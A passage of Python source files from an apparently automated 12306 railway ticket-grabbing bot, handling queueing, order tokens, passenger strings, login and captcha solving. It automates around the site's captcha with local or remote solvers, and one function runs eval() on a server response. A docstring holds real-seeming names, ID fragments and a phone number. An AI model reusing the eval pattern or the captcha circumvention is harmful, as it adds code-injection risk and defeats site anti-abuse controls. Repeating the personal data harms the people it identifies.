in c_data and c_data['errMsg']: print(u"提交订单失败,{0}".format(c_data['errMsg'])) else: print(c_data) print(u'订票失败!很抱歉,请重试提交预订功能!') elif "messages" in checkQueueOrderResult and checkQueueOrderResult["messages"]: print(u"提交订单失败,错误信息: " + checkQueueOrderResult["messages"]) else: print(u"提交订单中,请耐心等待:" + checkQueueOrderResult["message"]) except ValueError: print(u"接口 {} 无响应".format(checkQueueOrderUrl)) File: inter/QueryOrderWaitTime.py # coding=utf-8 import copy import time from config.TicketEnmu import ticket from config.emailConf import sendEmail from config.serverchanConf import sendServerChan from myException.ticketIsExitsException import ticketIsExitsException from myException.ticketNumOutException import ticketNumOutException class queryOrderWaitTime: """ 排队 """ def __init__(self, session): self.session = session def sendQueryOrderWaitTime(self): """ 排队获取订单等待信息,每隔3秒请求一次,最高请求次数为20次! 
:return: """ num = 1 while True: num += 1 if num > ticket.OUT_NUM: print(ticket.WAIT_OUT_NUM) order_id = self.queryMyOrderNoComplete() # 排队失败,自动取消排队订单 if order_id: self.cancelNoCompleteMyOrder(order_id) break try: queryOrderWaitTimeUrl = copy.deepcopy(self.session.urls["queryOrderWaitTimeUrl"]) queryOrderWaitTimeUrl["req_url"] = queryOrderWaitTimeUrl["req_url"].format(int(round(time.time() * 1000))) queryOrderWaitTimeResult = self.session.httpClint.send(queryOrderWaitTimeUrl) except ValueError: queryOrderWaitTimeResult = {} if queryOrderWaitTimeResult: if queryOrderWaitTimeResult.get("status", False): data = queryOrderWaitTimeResult.get("data", False) if data and data.get("orderId", ""): sendEmail(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId", ""))) sendServerChan(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId", ""))) raise ticketIsExitsException(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId"))) elif data.get("msg", False): print(data.get("msg", "")) break elif data.get("waitTime", False): print(ticket.WAIT_ORDER_CONTINUE.format(0 - data.get("waitTime", False))) else: pass elif queryOrderWaitTimeResult.get("messages", False): print(ticket.WAIT_ORDER_FAIL.format(queryOrderWaitTimeResult.get("messages", ""))) else: print(ticket.WAIT_ORDER_NUM.format(num + 1)) else: pass time.sleep(2) else: print(ticketNumOutException(ticket.WAIT_ORDER_SUB_FAIL)) def queryMyOrderNoComplete(self): """ 获取订单列表信息 :return: """ self.initNoComplete() queryMyOrderNoCompleteUrl = self.session.urls["queryMyOrderNoCompleteUrl"] data = {"_json_att": ""} try: queryMyOrderNoCompleteResult = self.session.httpClint.send(queryMyOrderNoCompleteUrl, data) except ValueError: queryMyOrderNoCompleteResult = {} if queryMyOrderNoCompleteResult: if queryMyOrderNoCompleteResult.get("data", False) and queryMyOrderNoCompleteResult["data"].get("orderDBList", False): return queryMyOrderNoCompleteResult["data"] elif queryMyOrderNoCompleteResult.get("data", False) and queryMyOrderNoCompleteResult["data"].get("orderCacheDTO", False): if queryMyOrderNoCompleteResult["data"]["orderCacheDTO"].get("message", False): print(queryMyOrderNoCompleteResult["data"]["orderCacheDTO"]["message"]["message"]) raise ticketNumOutException( queryMyOrderNoCompleteResult["data"]["orderCacheDTO"]["message"]["message"]) else: if queryMyOrderNoCompleteResult.get("message", False): print(queryMyOrderNoCompleteResult.get("message", False)) return False else: return False else: return False def initNoComplete(self): """ 获取订单前需要进入订单列表页,获取订单列表页session :return: """ initNoCompleteUrl = self.session.urls["initNoCompleteUrl"] data = {"_json_att": ""} self.session.httpClint.send(initNoCompleteUrl, data) def cancelNoCompleteMyOrder(self, sequence_no): """ 取消订单 :param sequence_no: 订单编号 :return: """ cancelNoCompleteMyOrderUrl = self.session.urls["cancelNoCompleteMyOrder"] cancelNoCompleteMyOrderData = { "sequence_no": sequence_no, "cancel_flag": "cancel_order", "_json_att": "" } cancelNoCompleteMyOrderResult = self.session.httpClint.send(cancelNoCompleteMyOrderUrl, cancelNoCompleteMyOrderData) if cancelNoCompleteMyOrderResult.get("data", False) and cancelNoCompleteMyOrderResult["data"].get("existError", "N"): print(ticket.CANCEL_ORDER_SUCCESS.format(sequence_no)) time.sleep(2) return True else: print(ticket.CANCEL_ORDER_FAIL.format(sequence_no)) return False File: inter/GetRepeatSubmitToken.py # coding=utf-8 import json import re class getRepeatSubmitToken: def __init__(self, session): self.session = session def sendGetRepeatSubmitToken(self): """ 
获取提交车票请求token :return: token """ initdc_url = self.session.urls["initdc_url"] initdc_result = self.session.httpClint.send(initdc_url, ) token_name = re.compile(r"var globalRepeatSubmitToken = '(\S+)'") ticketInfoForPassengerForm_name = re.compile(r'var ticketInfoForPassengerForm=(\{.+\})?') order_request_params_name = re.compile(r'var orderRequestDTO=(\{.+\})?') token = re.search(token_name, initdc_result).group(1) re_tfpf = re.findall(ticketInfoForPassengerForm_name, initdc_result) re_orp = re.findall(order_request_params_name, initdc_result) if re_tfpf: ticketInfoForPassengerForm = json.loads(re_tfpf[0].replace("'", '"')) else: ticketInfoForPassengerForm = "" if re_orp: order_request_params = json.loads(re_orp[0].replace("'", '"')) else: order_request_params = "" return { "token": token, "ticketInfoForPassengerForm": ticketInfoForPassengerForm, "order_request_params": order_request_params, "session": self.session } File: inter/GetPassCodeNewOrderAndLogin.py # coding=utf-8 import base64 import copy import random def getPassCodeNewOrderAndLogin(session, imgType): """ 下载验证码 :param session: :param imgType: 下载验证码类型,login=登录验证码,其余为订单验证码 :return: """ if imgType == "login": codeImgUrl = copy.deepcopy(session.urls["getCodeImg"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) else: codeImgUrl = copy.deepcopy(session.urls["codeImgByOrder"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) print(u"下载验证码...") img_path = './tkcode.png' result = session.httpClint.send(codeImgUrl) try: if isinstance(result, dict): print(u"下载验证码失败, 请手动检查是否ip被封,或者重试,请求地址:https://kyfw.12306.cn{}".format(codeImgUrl.get("req_url"))) return False else: print(u"下载验证码成功") try: with open(img_path, 'wb', encoding="utf-8") as img: img.write(result) except Exception: with open(img_path, 'wb') as img: img.write(result) return result except OSError: print(u"验证码下载失败,可能ip被封,确认请手动请求: {0}".format(codeImgUrl)) def getPassCodeNewOrderAndLogin1(session, imgType): """ 获取验证码2 :param session: :param imgType: :return: """ if imgType == "login": codeImgUrl = copy.deepcopy(session.urls["getCodeImg1"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) else: codeImgUrl = copy.deepcopy(session.urls["codeImgByOrder"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) print(u"下载验证码...") img_path = './tkcode.png' codeImgUrlRsp = session.httpClint.send(codeImgUrl) if not isinstance(codeImgUrlRsp, str): print("验证码获取失败") return result = eval(codeImgUrlRsp.split("(")[1].split(")")[0]).get("image") try: if isinstance(result, dict): print(u"下载验证码失败, 请手动检查是否ip被封,或者重试,请求地址:https://kyfw.12306.cn{}".format(codeImgUrl.get("req_url"))) return False else: print(u"下载验证码成功") try: with open(img_path, 'wb', encoding="utf-8") as img: img.write(result) except Exception: with open(img_path, 'wb') as img: img.write(base64.b64decode(result)) return result except OSError: print(u"验证码下载失败,可能ip被封或者文件写入没权限") if __name__ == '__main__': pass File: inter/GetQueueCount.py # coding=utf-8 import datetime import sys import time from collections import OrderedDict import wrapcache import TickerConfig from config.TicketEnmu import ticket from config.emailConf import sendEmail from config.serverchanConf import sendServerChan from config.urlConf import urls from inter.ConfirmSingleForQueue import confirmSingleForQueue from myException.ticketIsExitsException import ticketIsExitsException def conversion_int(str): return int(str) class getQueueCount: def __init__(self, session, is_need_code, 
ifShowPassCodeTime, set_type, station_dates, train_no, ticket_peoples, ticketInfoForPassengerForm, token, oldPassengerStr, passengerTicketStrList): self.station_dates = station_dates self.session = session self.is_need_code = is_need_code self.ifShowPassCodeTime = ifShowPassCodeTime self.set_type = set_type self.train_no = train_no self.ticket_peoples = ticket_peoples self.ticket_black_list = {} self.ticketInfoForPassengerForm = ticketInfoForPassengerForm self.token = token self.oldPassengerStr = oldPassengerStr self.passengerTicketStrList = passengerTicketStrList def data_par(self): """ 参数结构 自动提交代码接口-autoSubmitOrderRequest - 字段说明 - secretStr 车票代码 - train_date 乘车日期 - tour_flag 乘车类型 - purpose_codes 学生还是成人 - query_from_station_name 起始车站 - query_to_station_name 结束车站 - cancel_flag 默认2,我也不知道干嘛的 - bed_level_order_num 000000000000000000000000000000 - passengerTicketStr 乘客乘车代码 - oldPassengerStr 乘客编号代码 :return: """ if sys.version_info.major is 2: new_train_date = filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" ")) else: new_train_date = list(filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" "))) data = OrderedDict() data['train_date'] = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], ), data['train_no'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO']['train_no'], data['stationTrainCode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO'][ 'station_train_code'], data['seatType'] = self.set_type, data['fromStationTelecode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO'][ 'from_station'], data['toStationTelecode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO']['to_station'], data['leftTicket'] = self.ticketInfoForPassengerForm['leftTicketStr'], data['purpose_codes'] = self.ticketInfoForPassengerForm['purpose_codes'], data['train_location'] = self.ticketInfoForPassengerForm['train_location'], data['REPEAT_SUBMIT_TOKEN'] = self.token, return data def sendGetQueueCount(self): """ # 模拟查询当前的列车排队人数的方法 # 返回信息组成的提示字符串 :return: """ getQueueCountResult = self.session.httpClint.send(self.session.urls["getQueueCountUrl"], self.data_par()) if "status" in getQueueCountResult and getQueueCountResult["status"] is True: if "countT" in getQueueCountResult["data"]: ticket = getQueueCountResult["data"]["ticket"] ticket_split = sum(map(conversion_int, ticket.split(","))) if ticket.find(",") != -1 else ticket countT = getQueueCountResult["data"]["countT"] if int(ticket_split) is 0: wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"排队失败,当前余票数还剩: {ticket_split} 张") return print(u"排队成功, 你排在: {1}位, 当前余票还剩余: {0} 张".format(ticket_split, countT)) csf = confirmSingleForQueue(self.session, self.ifShowPassCodeTime, self.is_need_code, self.token, self.set_type, self.ticket_peoples, self.ticketInfoForPassengerForm, self.oldPassengerStr, self.passengerTicketStrList) csf.sendConfirmSingleForQueue() # else: # print(u"当前排队人数: {1} 当前余票还剩余:{0} 张,继续排队中".format(ticket_split, countT)) else: print(u"排队发现未知错误{0},将此列车 {1}加入小黑屋".format(getQueueCountResult, self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif "messages" in getQueueCountResult and getQueueCountResult["messages"]: print(u"排队异常,错误信息:{0}, 将此列车 
{1}加入小黑屋".format(getQueueCountResult["messages"][0], self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: if "validateMessages" in getQueueCountResult and getQueueCountResult["validateMessages"]: print(str(getQueueCountResult["validateMessages"])) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: print(u"未知错误 {0}".format("".join(getQueueCountResult))) class queryQueueByAfterNate: def __init__(self, session): """ 候补排队 :param session: """ self.session = session def sendQueryQueueByAfterNate(self): for i in range(10): queryQueueByAfterNateRsp = self.session.httpClint.send(urls.get("queryQueue")) if not queryQueueByAfterNateRsp.get("status"): print("".join(queryQueueByAfterNateRsp.get("messages")) or queryQueueByAfterNateRsp.get("validateMessages")) time.sleep(1) else: sendEmail(ticket.WAIT_ORDER_SUCCESS) sendServerChan(ticket.WAIT_ORDER_SUCCESS) raise ticketIsExitsException(ticket.WAIT_AFTER_NATE_SUCCESS) if __name__ == '__main__': new_train_date = list(filter(None, str(time.asctime(time.strptime("2019-10-07", "%Y-%m-%d"))).split(" "))) print(new_train_date) train_date = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], ) print(train_date) File: inter/AutoSubmitOrderRequest.py # coding=utf-8 import urllib from collections import OrderedDict from config.TicketEnmu import ticket from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn from inter.GetQueueCountAsync import getQueueCountAsync from inter.GetRandCode import getRandCode import TickerConfig class autoSubmitOrderRequest: """ 快读提交订单通道 """ def __init__(self, selectObj, secretStr, train_date, query_from_station_name, query_to_station_name, passengerTicketStr, oldPassengerStr, train_no, stationTrainCode, leftTicket, set_type,): self.set_type = set_type try: self.secretStr = urllib.unquote(secretStr) except AttributeError: self.secretStr = urllib.parse.unquote(secretStr) self.train_date = train_date self.query_from_station_name = query_from_station_name self.query_to_station_name = query_to_station_name self.passengerTicketStr = passengerTicketStr.rstrip("_{0}".format(self.set_type)) self.oldPassengerStr = oldPassengerStr self.session = selectObj self.train_no = train_no self.stationTrainCode = stationTrainCode self.leftTicket = leftTicket def data_par(self): """ 参数结构 自动提交代码接口-autoSubmitOrderRequest - 字段说明 - secretStr 车票代码 - train_date 乘车日期 - tour_flag 乘车类型 - purpose_codes 学生还是成人 - query_from_station_name 起始车站 - query_to_station_name 结束车站 - cancel_flag 默认2,我也不知道干嘛的 - bed_level_order_num 000000000000000000000000000000 - passengerTicketStr 乘客乘车代码 - oldPassengerStr 乘客编号代码 :return: """ data = OrderedDict() data["secretStr"] = self.secretStr data["train_date"] = self.train_date data["tour_flag"] = "dc" data["purpose_codes"] = "ADULT" data["query_from_station_name"] = TickerConfig.FROM_STATION data["query_to_station_name"] = TickerConfig.TO_STATION data["cancel_flag"] = 2 data["bed_level_order_num"] = "000000000000000000000000000000" data["passengerTicketStr"] = self.passengerTicketStr data["oldPassengerStr"] = self.oldPassengerStr return data def sendAutoSubmitOrderRequest(self): """ 请求下单接口 :return: """ urls = self.session.urls["autoSubmitOrderRequest"] data = self.data_par() autoSubmitOrderRequestResult = self.session.httpClint.send(urls, data) if 
autoSubmitOrderRequestResult and \ autoSubmitOrderRequestResult.get("status", False) and\ autoSubmitOrderRequestResult.get("httpstatus", False) == 200: requestResultData = autoSubmitOrderRequestResult.get("data", {}) if requestResultData: result = requestResultData.get("result", "") ifShowPassCode = requestResultData.get("ifShowPassCode", "N") ifShowPassCodeTime = int(requestResultData.get("ifShowPassCodeTime", "1000")) / float(1000) print(ticket.AUTO_SUBMIT_ORDER_REQUEST_C) g = getQueueCountAsync(session=self.session, train_no=self.train_no, stationTrainCode=self.stationTrainCode, fromStationTelecode=self.query_from_station_name, toStationTelecode=self.query_to_station_name, leftTicket=self.leftTicket, set_type=self.set_type, users=len(TickerConfig.TICKET_PEOPLES), station_dates=self.train_date, passengerTicketStr=self.passengerTicketStr, oldPassengerStr=self.oldPassengerStr, result=result, ifShowPassCodeTime=ifShowPassCodeTime, ) if ifShowPassCode == "Y": # 如果需要验证码 print(u"需要验证码") print(u"正在使用自动识别验证码功能") for i in range(3): randCode = getRandCode(is_auto_code=True, auto_code_type=2) checkcode = checkRandCodeAnsyn(self.session, randCode, "") if checkcode == 'TRUE': print(u"验证码通过,正在提交订单") data['randCode'] = randCode break else: print (u"验证码有误, {0}次尝试重试".format(i + 1)) print(u"验证码超过限定次数3次,放弃此次订票机会!") g.sendGetQueueCountAsync() else: print(ticket.AUTO_SUBMIT_ORDER_REQUEST_F) if autoSubmitOrderRequestResult.get("messages", ""): print("".join(autoSubmitOrderRequestResult.get("messages", ""))) elif autoSubmitOrderRequestResult.get("validateMessages", ""): print("".join(autoSubmitOrderRequestResult.get("validateMessages", ""))) File: inter/GetSuccessRate.py from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.SubmitOrderRequest import submitOrderRequestByAfterNate class getSuccessRate: def __init__(self, session, secretList): """ 获取成功信息 """ self.secretList = secretList self.session = session def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["successSecret"] = f"{self.secretList}#{ticker}" data["_json_att"] = "" return data def sendSuccessRate(self): successRateRsp = self.session.httpClint.send(urls.get("getSuccessRate"), self.data_apr()) if not successRateRsp.get("status"): print("".join(successRateRsp.get("messages")) or successRateRsp.get("validateMessages")) return flag = successRateRsp.get("data", {}).get("flag")[0] train_no = flag.get("train_no") print(f"准备提交候补订单,{flag.get('info')}") submit = submitOrderRequestByAfterNate(self.session, self.secretList, train_no) submit.sendSubmitOrderRequest() File: inter/CheckRandCodeAnsyn.py # coding=utf-8 class checkRandCodeAnsyn: def __init__(self, session, randCode, token): self.session = session self.randCode = randCode self.token = token def data_par(self): """ :return: """ data = { "randCode": self.randCode, "rand": "randp", "_json_att": "", "REPEAT_SUBMIT_TOKEN": self.token } return data def sendCheckRandCodeAnsyn(self): """ 下单验证码识别 :return: """ checkRandCodeAnsynUrl = self.session.urls["checkRandCodeAnsyn"] 
fresult = self.session.httpClint.send(checkRandCodeAnsynUrl, self.data_par()) # 校验验证码是否正确 return fresult['data']['msg'] File: inter/GetPassengerDTOs.py # coding=utf-8 import json from config.TicketEnmu import ticket from myException.PassengerUserException import PassengerUserException import wrapcache import TickerConfig class getPassengerDTOs: """ 获取乘客信息 :return: """ def __init__(self, selectObj, ticket_peoples=None, set_type=None, is_more_ticket_num=None): """ :param session: 登录实例 :param ticket_peoples: 乘客 :param set_type: 坐席 """ if ticket_peoples is None: ticket_peoples = [] self.session = selectObj self.ticket_peoples = ticket_peoples self.is_more_ticket_num = is_more_ticket_num self.set_type = set_type def sendGetPassengerDTOs(self): getPassengerDTOsResult = self.session.httpClint.send(self.session.urls["get_passengerDTOs"], json.dumps({"_json_att": ""})) if getPassengerDTOsResult.get("data", False) and getPassengerDTOsResult["data"].get("normal_passengers", False): normal_passengers = getPassengerDTOsResult['data']['normal_passengers'] _normal_passenger = [normal_passengers[i] for i in range(len(normal_passengers)) if normal_passengers[i]["passenger_name"] in self.ticket_peoples] return _normal_passenger if _normal_passenger else [normal_passengers[0]] # 如果配置乘车人没有在账号,则默认返回第一个用户 else: if getPassengerDTOsResult.get("data", False) and getPassengerDTOsResult['data'].get("exMsg", False): print(getPassengerDTOsResult['data'].get("exMsg", False)) elif getPassengerDTOsResult.get('messages', False): print(getPassengerDTOsResult.get('messages', False)) else: print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") # raise PassengerUserException(ticket.DTO_NOT_FOUND) def getPassengerTicketStr(self, set_type): """ 获取getPassengerTicketStr 提交对应的代号码 :param str: 坐席 :return: """ passengerTicketStr = { '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9, '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3, } return str(passengerTicketStr[set_type.replace(' ', '')]) def getPassengerTicketStrListAndOldPassengerStr(self, secretStr, secretList): """ 获取提交车次人内容格式 passengerTicketStr O,0,1,文贤平,1,43052419950223XXXX,15618715583,N_O,0,1,梁敏,1,43052719920118XXXX,,N oldPassengerStr 文贤平,1,43052719920118XXXX,1_梁敏,1,43052719920118XXXX,1 ps: 如果is_more_ticket打开了的话,那就是读取联系人列表里面前符合车次数量的前几个联系人 :return: """ passengerTicketStrList = [] oldPassengerStr = [] tickers = [] set_type = "" if wrapcache.get("user_info"): # 如果缓存中有联系人方式,则读取缓存中的联系人 user_info = wrapcache.get("user_info") print(u"使用缓存中查找的联系人信息") else: user_info = self.sendGetPassengerDTOs() wrapcache.set("user_info", user_info, timeout=9999999) if not user_info: raise PassengerUserException(ticket.DTO_NOT_IN_LIST) if len(user_info) < self.is_more_ticket_num: # 如果乘车人填错了导致没有这个乘车人的话,可能乘车人数会小于自动乘车人 self.is_more_ticket_num = len(user_info) if secretStr: set_type = self.getPassengerTicketStr(self.set_type) if self.is_more_ticket_num is 1: passengerTicketStrList.append( '0,' + user_info[0]['passenger_type'] + "," + user_info[0][ "passenger_name"] + "," + user_info[0]['passenger_id_type_code'] + "," + user_info[0]['passenger_id_no'] + "," + user_info[0]['mobile_no'] + ',N,' + user_info[0]["allEncStr"]) oldPassengerStr.append( user_info[0]['passenger_name'] + "," + user_info[0]['passenger_id_type_code'] + "," + user_info[0]['passenger_id_no'] + "," + user_info[0]['passenger_type'] + '_') else: for i in range(self.is_more_ticket_num): passengerTicketStrList.append( '0,' + 
user_info[i]['passenger_type'] + "," + user_info[i][ "passenger_name"] + "," + user_info[i]['passenger_id_type_code'] + "," + user_info[i][ 'passenger_id_no'] + "," + user_info[i]['mobile_no'] + ',N,' + user_info[i]["allEncStr"] + '_' + set_type) oldPassengerStr.append( user_info[i]['passenger_name'] + "," + user_info[i]['passenger_id_type_code'] + "," + user_info[i]['passenger_id_no'] + "," + user_info[i]['passenger_type'] + '_') elif secretList: """ 候补订单有多少个联系人,就候补多少个联系人了,没有优先提交之说 1#XXXX#1#***************77X#bf6ae40d3655ae7eff005ee21d95876b38ab97a8031b464bc2f74a067e3ec957; """ for user in user_info: tickers.append(f"1#{user['passenger_name']}#1#{user['passenger_id_no']}#{user['allEncStr']};") return { "passengerTicketStrList": set_type + "," + ",".join(passengerTicketStrList), "passengerTicketStrByAfterLate": "".join(tickers), "oldPassengerStr": "".join(oldPassengerStr), "code": ticket.SUCCESS_CODE, "set_type": set_type, "status": True, "user_info": user_info, } File: inter/LoginAysnSuggest.py # coding=utf-8 from config.urlConf import urls def loginAysnSuggest(session, username, password): """ 登录接口 ps: 不需要验证码 :return: """ loginAysnSuggestUrls = urls.get("loginAysnSuggest") data = { "loginUserDTO.user_name": username, "userDTO.password": password } loginAysnSuggestRsp = session.httpClint.send(urls=loginAysnSuggestUrls, data=data) if loginAysnSuggestRsp and loginAysnSuggestRsp.get("httpstatus") is 200 and loginAysnSuggestRsp.get("data", {}).get("loginCheck") == "Y": print(u"登录成功") else: print(u"登录失败, {0} {1}".format("".join(loginAysnSuggestRsp.get("messages")), loginAysnSuggestRsp.get("validateMessages"))) File: inter/GetRandCode.py # coding=utf-8 from PIL import Image from config.urlConf import urls from myUrllib.httpUtils import HTTPClient from verify.localVerifyCode import Verify import TickerConfig import os if TickerConfig.AUTO_CODE_TYPE == 2: v = Verify() def getRandCode(is_auto_code, auto_code_type, result): """ 识别验证码 :return: 坐标 """ try: if is_auto_code: if auto_code_type == 1: print(u"打码兔已关闭, 如需使用自动识别,请使用如果平台 auto_code_type == 2") return elif auto_code_type == 2: Result = v.verify(result) return codexy(Ofset=Result, is_raw_input=False) elif auto_code_type == 3: print("您已设置使用云打码,但是服务器资源有限,请尽快改为本地打码" if "CAPTCHALOCAL" not in os.environ else "已设置本地打码服务器") http = HTTPClient(0) Result = http.send(urls.get("autoVerifyImage"), {"imageFile": result}) if Result and Result.get("code") is 0: return codexy(Ofset=Result.get("data"), is_raw_input=False) else: img = Image.open('./tkcode.png') img.show() return codexy() except Exception as e: print(e) def codexy(Ofset=None, is_raw_input=True): """ 获取验证码 :return: str """ if is_raw_input: print(u""" ***************** | 1 | 2 | 3 | 4 | ***************** | 5 | 6 | 7 | 8 | ***************** """) print(u"验证码分为8个,对应上面数字,例如第一和第二张,输入1, 2 如果开启cdn查询的话,会冲掉提示,直接鼠标点击命令行获取焦点,输入即可,不要输入空格") print(u"如果是linux无图形界面,请使用自动打码,is_auto_code: True") print(u"如果没有弹出验证码,请手动双击根目录下的tkcode.png文件") Ofset = input(u"输入对应的验证码: ") if isinstance(Ofset, list): select = Ofset else: Ofset = Ofset.replace(",", ",") select = Ofset.split(',') post = [] offsetsX = 0 # 选择的答案的left值,通过浏览器点击8个小图的中点得到的,这样基本没问题 offsetsY = 0 # 选择的答案的top值 for ofset in select: if ofset == '1': offsetsY = 77 offsetsX = 40 elif ofset == '2': offsetsY = 77 offsetsX = 112 elif ofset == '3': offsetsY = 77 offsetsX = 184 elif ofset == '4': offsetsY = 77 offsetsX = 256 elif ofset == '5': offsetsY = 149 offsetsX = 40 elif ofset == '6': offsetsY = 149 offsetsX = 112 elif ofset == '7': offsetsY = 149 offsetsX = 184 elif ofset 
== '8': offsetsY = 149 offsetsX = 256 else: pass post.append(offsetsX) post.append(offsetsY) randCode = str(post).replace(']', '').replace('[', '').replace("'", '').replace(' ', '') print(u"验证码识别坐标为{0}".format(randCode)) return randCode File: inter/ConfirmHB.py from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.GetQueueCount import queryQueueByAfterNate class confirmHB: def __init__(self, secretList, session, tickerNo, jzdhDate): """ 人脸识别 """ self.secretList = secretList self.session = session self.passengerTicketStrByAfterLate = session.passengerTicketStrByAfterLate self.tickerNo = tickerNo self.jzdhDate = jzdhDate def data_apr(self): """ passengerInfo 1#XXXX#1#***************77X#bf6ae40d3655ae7eff005ee21d95876b38ab97a8031b464bc2f74a067e3ec957; jzParam 2019-08-31#19#00 hbTrain 5l000G177230,O# lkParam :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["passengerInfo"] = self.passengerTicketStrByAfterLate data["jzParam"] = self.jzdhDate data["hbTrain"] = f"{self.tickerNo},{ticker}#" data["lkParam"] = "" return data def sendChechFace(self): ChechFaceRsp = self.session.httpClint.send(urls.get("confirmHB"), self.data_apr()) if not ChechFaceRsp.get("status"): print("".join(ChechFaceRsp.get("messages")) or ChechFaceRsp.get("validateMessages")) return data = ChechFaceRsp.get("data") if not data.get("flag"): print(f"错误信息:{data.get('msg')}") return queue = queryQueueByAfterNate(self.session) queue.sendQueryQueueByAfterNate() File: inter/GetQueueCountAsync.py import TickerConfig []# coding=utf-8 import datetime import sys import time from collections import OrderedDict import wrapcache from inter.ConfirmSingleForQueueAsys import confirmSingleForQueueAsys class getQueueCountAsync: """ 排队 """ def __init__(self, session, train_no, stationTrainCode, fromStationTelecode, toStationTelecode, leftTicket, set_type, users, station_dates, passengerTicketStr, oldPassengerStr, result, ifShowPassCodeTime): self.train_no = train_no self.session = session self.stationTrainCode = stationTrainCode self.fromStationTelecode = fromStationTelecode self.toStationTelecode = toStationTelecode self.set_type = set_type self.leftTicket = leftTicket self.users = users self.station_dates = station_dates self.passengerTicketStr = passengerTicketStr self.oldPassengerStr = oldPassengerStr self.result = result self.ifShowPassCodeTime=ifShowPassCodeTime def data_par(self): """ - 字段说明 - train_date 时间 - train_no 列车编号,查询代码里面返回 - stationTrainCode 列车编号 - seatType 对应坐席 - fromStationTelecode 起始城市 - toStationTelecode 到达城市 - leftTicket 查询代码里面返回 - purpose_codes 学生还是成人 - _json_att 没啥卵用,还是带上吧 :return: """ if sys.version_info.major is 2: new_train_date = filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" ")) else: new_train_date = list(filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" "))) data = OrderedDict() data['train_date'] = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], time.strftime("%H:%M:%S", time.localtime(time.time())) ), data["train_no"] = self.train_no data["stationTrainCode"] = self.stationTrainCode data["seatType"] = self.set_type data["fromStationTelecode"] = self.fromStationTelecode data["toStationTelecode"] = self.toStationTelecode data["leftTicket"] = self.leftTicket data["purpose_codes"] = "ADULT" 
data["_json_att"] = "" return data def conversion_int(self, str): return int(str) def sendGetQueueCountAsync(self): """ 请求排队接口 :return: """ urls = self.session.urls["getQueueCountAsync"] data = self.data_par() getQueueCountAsyncResult = self.session.httpClint.send(urls, data) if getQueueCountAsyncResult.get("status", False) and getQueueCountAsyncResult.get("data", False): if "status" in getQueueCountAsyncResult and getQueueCountAsyncResult["status"] is True: if "countT" in getQueueCountAsyncResult["data"]: ticket_data = getQueueCountAsyncResult["data"]["ticket"] ticket_split = sum(map(self.conversion_int, ticket_data.split(","))) if ticket_data.find( ",") != -1 else ticket_data if int(ticket_split) is 0: # 增加余票数为0时,将车次加入小黑屋 wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"排队失败,当前余票数为{ticket_split}张") return print(u"排队成功, 当前余票还剩余: {0} 张".format(ticket_split)) c = confirmSingleForQueueAsys(session=self.session, passengerTicketStr=self.passengerTicketStr, oldPassengerStr=self.oldPassengerStr, result=self.result,) print(u"验证码提交安全期,等待{}MS".format(self.ifShowPassCodeTime)) 